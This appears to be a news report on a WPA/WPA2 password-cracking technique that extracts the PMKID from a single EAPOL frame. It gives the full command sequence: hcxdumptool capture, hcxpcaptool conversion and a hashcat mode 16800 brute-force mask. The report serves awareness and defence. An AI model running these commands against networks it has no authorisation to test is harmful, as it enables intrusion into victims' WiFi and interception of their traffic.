A new WiFi hacking method for WPA/WPA2

A specialist has found a new way to crack passwords on most modern routers

The cybersecurity and digital forensic expert Jens “Atom” Steube, who is known for having developed Hashcat, the popular cracking password tool, returns to the scene with the development of a new WiFi hacking method that allows finding the password for most currently used routers.

According to reports of specialists in digital forensics from the International Institute of Cyber Security, this attack technique works against the wireless network protocols WPA/WPA2 with roaming functions based on Pairwise Master Key identifier (PMKID) enabled. Steube discovered this attack variant while conducting an investigation related to the security protocol WiFi WPA3.

The technique allows attackers to retrieve Pre Shared Keys (PSK) and use them to hack the targeted WiFi network, thus accessing the victim’s Internet traffic data.

However, it differs from other WiFi hacking techniques; this attack does not require capturing a four-way LAN Extensible Authentication Protocol (EAPOL) authentication handshake. According to specialists in digital forensics from the International Institute of Cyber Security, this attack is carried out in the Robust Security Network Information Element (RSN IE), using a single EAPOL framework after requesting it from the access point.

“This attack variant was discovered incidentally while we were looking for ways to attack the new WPA3 security standard. On the other hand, hacking this new standard would be much more complex because of its modern key-setting protocol known as Simultaneous Authentication of Equals (SAE),” the expert mentioned.

According to Steube, the main difference between this new method and the rest of the known attacks is that this attack does not require the capture of the complete EAPOL binding protocol, because “it is done in the RSN IE element of a single EAPOL frame”.

The RSN protocol allows you to establish secure communications over 802.11 wireless networks. It uses the PMKID key to establish a connection between client and an access point. According to the expert’s report, the attack is carried out as follows:

  • Run hcxdumptool to request the PMKID from the access point and return the frame received as a file (in pcapng format)

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

  • Run the hcxpcaptool tool to convert the captured data from the pcapng format to a hash format accepted by Hashcat

$ ./hcxpcaptool -z test.16800 test.pcapng

  • Start the Hashcat cracking tool (v 4.2.0 or higher versions) and decrypt it. The hash mode we need to use is 16800

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

This will restore the password of the victim’s WiFi network. Steube points out that he ignores in how many routers exactly this attack works, but he believes that the attack could be functional against all WiFi 802.11 i/p/q/r networks with roaming capabilities enabled. “In other words, the attack would work against most modern routers,” adds Steube.